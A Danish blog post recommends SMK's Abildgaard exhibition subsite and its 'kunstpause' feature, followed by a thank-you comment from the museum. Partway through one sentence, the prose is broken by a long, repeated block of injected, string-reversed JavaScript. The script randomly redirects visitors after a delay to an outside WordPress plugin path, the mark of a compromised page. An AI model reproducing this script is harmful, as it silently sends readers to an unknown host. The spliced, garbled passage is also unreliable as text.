SMK´s subsite om Abildgaard

abildgaard

Statens Museum for Kunst – også kendt som SMK … dem med den sorte ramme som logo 😉 ….  har lavet et subsite til den nye Abildgaard-udstilling på http://www.smk.dk/abildgaard. Sitet er en del af den ordinære website, hvor det er placeret som en folder. 

I bunden af hver temaside (fx denne om “Traditionens spøgelse“) ligger en feature, som jeg personligt synes godt om: En “kunstpause”, hvor lidt musik og enkel manipulering af værkerne som still-billeder giver en spændende oplevelse af de valgte malerier. Der er også forskellige, mere formidlende web-tv indslag.

Jeg får ikke siten på første side i Google ved en søgning på “Abilgaard” (endnu) men den er på vej op, for den har ihvertfald bevæget sig fra bunden af side 2 til nu at være nr. 3 på denne side. Faktisk ligger den bedre end Den Stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tore Danske´s opslag om Abildgaard. Og hvis siderne om Abildgaard og hans kunst skal have et liv også efter, at udstillingen er lukket, er der jo rigtig gode pointer i at gøre det på denne måde.

Så dette er bare en lille reklame for sitet… hvis man ikke har været forbi på http://www.smk.dk/abildgaard endnu. Der er mange små fede ting at lade sig inspirere af.

PS: Bortset fra spillet. Det er rigtig dumt og kedeligt ….. for jeg fik ingen rigtige 😉

One comment to “SMK´s subsite om Abildgaard”
  1. Tusind tak for god respons på vores Abildgaard subsite. Nogle af de nye features vi afprøver, er en forsmag på det vi arbejder med i projektet Kunsthistorier (lanceres i slutningen af 2010). Så er der andre derude der har ris og ros eller vil dele jeres oplevelse, er vi meget lydhøre.

Skriv et svar